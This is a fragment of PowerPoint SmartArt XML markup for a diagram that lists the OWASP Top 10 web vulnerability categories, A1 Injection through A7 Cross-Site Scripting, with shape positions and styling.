            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E29700A-435A-4D0C-A3EC-5C6849A6CB58}" type="parTrans" cxnId="{3B66A44C-4634-4578-848B-446770CBFA96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DCEB2E2B-16CD-44BC-B6FA-F8D7196F1103}" type="sibTrans" cxnId="{3B66A44C-4634-4578-848B-446770CBFA96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB" sz="2000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" type="pres">
      <dgm:prSet presAssocID="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AD2E9B06-A06B-443C-83A3-58564550A9C4}" type="pres">
      <dgm:prSet presAssocID="{64169CBD-621B-41AC-8098-190EB836285B}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A30A05D7-A3A0-471E-BE40-D9A5641B2C43}" type="pres">
      <dgm:prSet presAssocID="{55DCDCCE-3CAF-428A-ABFC-A8BC8FEF6AA5}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{049F4145-C84A-42C6-8C4A-A73F5D1F13B1}" type="pres">
      <dgm:prSet presAssocID="{05B6A14E-A58A-427E-80F5-495E20005676}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="10" custLinFactNeighborX="-3452" custLinFactNeighborY="1285">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{83238806-E393-4882-A18C-F18C628330C0}" type="pres">
      <dgm:prSet presAssocID="{E232C4F9-D265-42B7-A469-2C93E3FE3984}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C3E7A39C-1CAB-4280-9674-550D9EBD3664}" type="pres">
      <dgm:prSet presAssocID="{7FBC627C-7A5D-4F89-A1E1-F66E815CA8A7}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="10" custLinFactNeighborY="-1132">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{931C115E-C0A7-4720-AB3F-606E25B53088}" type="pres">
      <dgm:prSet presAssocID="{678EE478-5D87-49D0-AC29-0A904E85A9CD}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E8C025AC-D346-4996-A766-7B95C12CD05B}" type="pres">
      <dgm:prSet presAssocID="{612007B8-8546-4F29-8566-2D3A5E6A0E13}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E96477BF-5B73-472A-919C-7329A585FDF6}" type="pres">
      <dgm:prSet presAssocID="{5275B559-D302-4AB5-AEBD-D60C613E6CD7}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E75F8F30-3FA0-429A-A777-BC11F620C600}" type="pres">
      <dgm:prSet presAssocID="{C1059736-A6E2-4762-8F49-0456CD8B7C69}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52B5463B-623E-4AEB-A7DB-47178B6C71AF}" type="pres">
      <dgm:prSet presAssocID="{C998CC39-D1D3-43DE-8252-4B94A9279E42}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB0C875D-FE74-43CF-93AC-5786FA5B1F14}" type="pres">
      <dgm:prSet presAssocID="{0A8A3DAD-DEA7-4D65-911B-8A3E28473A85}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EE972C07-CCE2-4853-8C2D-A707398F1C0F}" type="pres">
      <dgm:prSet presAssocID="{AEE688A1-9D64-4205-AB1C-FB4631414487}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8BBDA470-83FD-473A-8CA2-0613FB964C29}" type="pres">
      <dgm:prSet presAssocID="{46B9D804-FF29-457F-BCED-346AF8464375}" presName="node" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A35F7828-DFE8-461B-BD5F-130A0F9AF4D9}" type="pres">
      <dgm:prSet presAssocID="{64941BF5-DD7A-45EE-B676-544B2D4EE4A4}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{59DD1C5D-599E-4CCD-9219-47AAF377CCFF}" type="pres">
      <dgm:prSet presAssocID="{F977D8BD-EA13-4B0E-B094-A138093AD07F}" presName="node" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D4EE704B-71A7-4D2A-A64B-721C915258CB}" type="pres">
      <dgm:prSet presAssocID="{48212937-C659-41D8-94B9-45657A45F3D4}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{05902CD6-3368-4AEF-857F-AE64CE7F66E4}" type="pres">
      <dgm:prSet presAssocID="{85F6E29B-C4B8-48BE-9B88-FA3493C4C603}" presName="node" presStyleLbl="node1" presStyleIdx="8" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A91423D8-DCF5-4E94-8C47-EFE9233E577F}" type="pres">
      <dgm:prSet presAssocID="{DCEB2E2B-16CD-44BC-B6FA-F8D7196F1103}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AB8EC8CA-2DD9-43B0-BAC8-DBF5D6A86196}" type="pres">
      <dgm:prSet presAssocID="{231AA091-BC50-4CB1-B212-84DF97C37E43}" presName="node" presStyleLbl="node1" presStyleIdx="9" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{AE4E6705-38DF-4ECA-80E1-760699C4E255}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{05B6A14E-A58A-427E-80F5-495E20005676}" srcOrd="1" destOrd="0" parTransId="{2F9BC56F-924A-4353-9F8F-40E52BE6F39F}" sibTransId="{E232C4F9-D265-42B7-A469-2C93E3FE3984}"/>
    <dgm:cxn modelId="{5160490B-30B5-4BC8-8353-C73FDCEAB94D}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{46B9D804-FF29-457F-BCED-346AF8464375}" srcOrd="6" destOrd="0" parTransId="{6D72ED69-2D18-43DC-B4B3-CC07C84725FA}" sibTransId="{64941BF5-DD7A-45EE-B676-544B2D4EE4A4}"/>
    <dgm:cxn modelId="{07930510-0312-411D-AF83-BF65AF6FF61A}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{612007B8-8546-4F29-8566-2D3A5E6A0E13}" srcOrd="3" destOrd="0" parTransId="{B2C66789-85B1-4DEA-99D3-EE1EE6047C79}" sibTransId="{5275B559-D302-4AB5-AEBD-D60C613E6CD7}"/>
    <dgm:cxn modelId="{0F480011-4146-4164-8F11-70C9DC866631}" type="presOf" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{63E0B01F-E6B0-4341-846D-AEB7BCF19307}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{C1059736-A6E2-4762-8F49-0456CD8B7C69}" srcOrd="4" destOrd="0" parTransId="{DBCB215F-2702-4FBF-9B10-EE479A00694C}" sibTransId="{C998CC39-D1D3-43DE-8252-4B94A9279E42}"/>
    <dgm:cxn modelId="{2E976421-44BA-4078-86CD-9AE8B0455758}" type="presOf" srcId="{7FBC627C-7A5D-4F89-A1E1-F66E815CA8A7}" destId="{C3E7A39C-1CAB-4280-9674-550D9EBD3664}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{DD191027-8117-4E70-B8B2-2C52619FB55E}" type="presOf" srcId="{46B9D804-FF29-457F-BCED-346AF8464375}" destId="{8BBDA470-83FD-473A-8CA2-0613FB964C29}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{A143E42D-7056-4620-8273-5F92B779A353}" type="presOf" srcId="{0A8A3DAD-DEA7-4D65-911B-8A3E28473A85}" destId="{DB0C875D-FE74-43CF-93AC-5786FA5B1F14}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{C4D0C134-F6C0-4A26-8194-F0A70DEC835B}" type="presOf" srcId="{231AA091-BC50-4CB1-B212-84DF97C37E43}" destId="{AB8EC8CA-2DD9-43B0-BAC8-DBF5D6A86196}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{E8FA1B3E-891C-44F5-8B95-213F7D5CE5C0}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{64169CBD-621B-41AC-8098-190EB836285B}" srcOrd="0" destOrd="0" parTransId="{C2478B4C-85CC-4B56-8035-A1D085B2572C}" sibTransId="{55DCDCCE-3CAF-428A-ABFC-A8BC8FEF6AA5}"/>
    <dgm:cxn modelId="{74914C63-D094-4D58-9F0F-EF427C7629D1}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{0A8A3DAD-DEA7-4D65-911B-8A3E28473A85}" srcOrd="5" destOrd="0" parTransId="{6351F65D-D2EB-47D4-9A72-1293010D2EF2}" sibTransId="{AEE688A1-9D64-4205-AB1C-FB4631414487}"/>
    <dgm:cxn modelId="{0FCCCC45-3B64-4C3E-8C00-43A853EF072A}" type="presOf" srcId="{64169CBD-621B-41AC-8098-190EB836285B}" destId="{AD2E9B06-A06B-443C-83A3-58564550A9C4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{3B66A44C-4634-4578-848B-446770CBFA96}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{85F6E29B-C4B8-48BE-9B88-FA3493C4C603}" srcOrd="8" destOrd="0" parTransId="{5E29700A-435A-4D0C-A3EC-5C6849A6CB58}" sibTransId="{DCEB2E2B-16CD-44BC-B6FA-F8D7196F1103}"/>
    <dgm:cxn modelId="{A8C95571-758F-487A-B3FF-9FB85AACC72F}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{F977D8BD-EA13-4B0E-B094-A138093AD07F}" srcOrd="7" destOrd="0" parTransId="{816F569F-92A3-458D-ADDF-2632F412238B}" sibTransId="{48212937-C659-41D8-94B9-45657A45F3D4}"/>
    <dgm:cxn modelId="{CE6D367A-FFD4-400B-AE54-6C1A9392EFBD}" type="presOf" srcId="{C1059736-A6E2-4762-8F49-0456CD8B7C69}" destId="{E75F8F30-3FA0-429A-A777-BC11F620C600}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{8D4CFB84-C4F6-4124-90A8-26CC50E64215}" type="presOf" srcId="{F977D8BD-EA13-4B0E-B094-A138093AD07F}" destId="{59DD1C5D-599E-4CCD-9219-47AAF377CCFF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{828B4993-187A-4C8C-880D-30CC9238FEC0}" type="presOf" srcId="{612007B8-8546-4F29-8566-2D3A5E6A0E13}" destId="{E8C025AC-D346-4996-A766-7B95C12CD05B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{395778C8-53B7-4ABA-B003-A8A213D8106E}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{231AA091-BC50-4CB1-B212-84DF97C37E43}" srcOrd="9" destOrd="0" parTransId="{DFD4E4B3-889C-44E4-98F7-CDE5F5A9E369}" sibTransId="{A9F48C2C-FB58-44F1-8762-0ACF43D4AFFD}"/>
    <dgm:cxn modelId="{62F5A9D3-EBF9-4BEC-9613-FD255126CCE1}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{7FBC627C-7A5D-4F89-A1E1-F66E815CA8A7}" srcOrd="2" destOrd="0" parTransId="{C77C0D7A-4688-41D5-A7B6-ECC1745C80BA}" sibTransId="{678EE478-5D87-49D0-AC29-0A904E85A9CD}"/>
    <dgm:cxn modelId="{B4A51FE2-693E-434B-8D48-B0FDDC711786}" type="presOf" srcId="{05B6A14E-A58A-427E-80F5-495E20005676}" destId="{049F4145-C84A-42C6-8C4A-A73F5D1F13B1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{BC8D60F8-8521-4FAF-8970-7292F710BDE7}" type="presOf" srcId="{85F6E29B-C4B8-48BE-9B88-FA3493C4C603}" destId="{05902CD6-3368-4AEF-857F-AE64CE7F66E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{843456F9-BA64-4E42-9F06-6AD0EDCFB862}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{AD2E9B06-A06B-443C-83A3-58564550A9C4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{D55B46AD-6F44-402A-A328-A127747F0B0D}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{A30A05D7-A3A0-471E-BE40-D9A5641B2C43}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{DE3906C9-59D5-4BAD-B4F2-D97672A3DFA0}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{049F4145-C84A-42C6-8C4A-A73F5D1F13B1}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{7F7D9923-F112-4EF3-B702-55C8FF38B6F1}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{83238806-E393-4882-A18C-F18C628330C0}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{17A6DC86-DB94-4119-94DF-A76E731E512A}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{C3E7A39C-1CAB-4280-9674-550D9EBD3664}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{92B70345-24E4-4182-9FE7-515BBF6C6177}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{931C115E-C0A7-4720-AB3F-606E25B53088}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{BA0F4561-0925-4256-89D2-D9D6C33A238D}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{E8C025AC-D346-4996-A766-7B95C12CD05B}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{EE041030-1C12-403F-A04E-1458261616BB}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{E96477BF-5B73-472A-919C-7329A585FDF6}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{7DB81D69-AA4C-4B56-A480-799EF04DF61D}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{E75F8F30-3FA0-429A-A777-BC11F620C600}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{0630B50E-A6FE-49BF-BF86-9E29C083D24C}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{52B5463B-623E-4AEB-A7DB-47178B6C71AF}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{F297A2EB-0FC7-4C88-B00B-D475E164653D}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{DB0C875D-FE74-43CF-93AC-5786FA5B1F14}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{01370AD5-894C-4359-8569-FC2F36769543}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{EE972C07-CCE2-4853-8C2D-A707398F1C0F}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{F4AE03F3-85E7-4FE6-B75A-E72B10509E5B}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{8BBDA470-83FD-473A-8CA2-0613FB964C29}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{98AE88C9-3D27-41E3-829B-4037852AADE0}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{A35F7828-DFE8-461B-BD5F-130A0F9AF4D9}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{7CF2C44B-3076-4DB3-B099-104E9DFF2652}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{59DD1C5D-599E-4CCD-9219-47AAF377CCFF}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{AA94394B-B103-4719-9703-06C4FCD2FF74}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{D4EE704B-71A7-4D2A-A64B-721C915258CB}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{E0744F37-69CE-4F7C-B791-D606256AE539}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{05902CD6-3368-4AEF-857F-AE64CE7F66E4}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{AC541811-2CC9-4172-8350-871582518C77}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{A91423D8-DCF5-4E94-8C47-EFE9233E577F}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#2"/>
    <dgm:cxn modelId="{A7E9FEA2-92F5-4AB5-BB11-56B2CBD07EF7}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{AB8EC8CA-2DD9-43B0-BAC8-DBF5D6A86196}" srcOrd="18" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/defaul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E9B06-A06B-443C-83A3-58564550A9C4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2701" y="364479"/>
          <a:ext cx="2142976" cy="1285785"/>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A1: Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2701" y="364479"/>
        <a:ext cx="2142976" cy="1285785"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{049F4145-C84A-42C6-8C4A-A73F5D1F13B1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2285999" y="381002"/>
          <a:ext cx="2142976" cy="1285785"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="-496086"/>
            <a:satOff val="2989"/>
            <a:lumOff val="24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A2: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" kern="1200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Broken Authentication</a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2285999" y="381002"/>
        <a:ext cx="2142976" cy="1285785"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C3E7A39C-1CAB-4280-9674-550D9EBD3664}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4717248" y="349924"/>
          <a:ext cx="2142976" cy="1285785"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="-992171"/>
            <a:satOff val="5978"/>
            <a:lumOff val="47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A3: Sensitive Data Exposure</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4717248" y="349924"/>
        <a:ext cx="2142976" cy="1285785"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E8C025AC-D346-4996-A766-7B95C12CD05B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7074522" y="364479"/>
          <a:ext cx="2142976" cy="1285785"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="-1488257"/>
            <a:satOff val="8966"/>
            <a:lumOff val="71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A4: XML External Entities (XXE)</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7074522" y="364479"/>
        <a:ext cx="2142976" cy="1285785"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E75F8F30-3FA0-429A-A777-BC11F620C600}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2701" y="1864563"/>
          <a:ext cx="2142976" cy="1285785"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="-1984342"/>
            <a:satOff val="11955"/>
            <a:lumOff val="95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A5: Broken Access Control</a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2701" y="1864563"/>
        <a:ext cx="2142976" cy="1285785"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DB0C875D-FE74-43CF-93AC-5786FA5B1F14}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2359975" y="1864563"/>
          <a:ext cx="2142976" cy="1285785"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="-2480428"/>
            <a:satOff val="14944"/>
            <a:lumOff val="119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A6: Security Misconfiguration</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2359975" y="1864563"/>
        <a:ext cx="2142976" cy="1285785"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8BBDA470-83FD-473A-8CA2-0613FB964C29}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4717248" y="1864563"/>
          <a:ext cx="2142976" cy="1285785"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="-2976513"/>
            <a:satOff val="17933"/>
            <a:lumOff val="143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A7: </a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-GB" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t> Cross-Site Scripting</a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
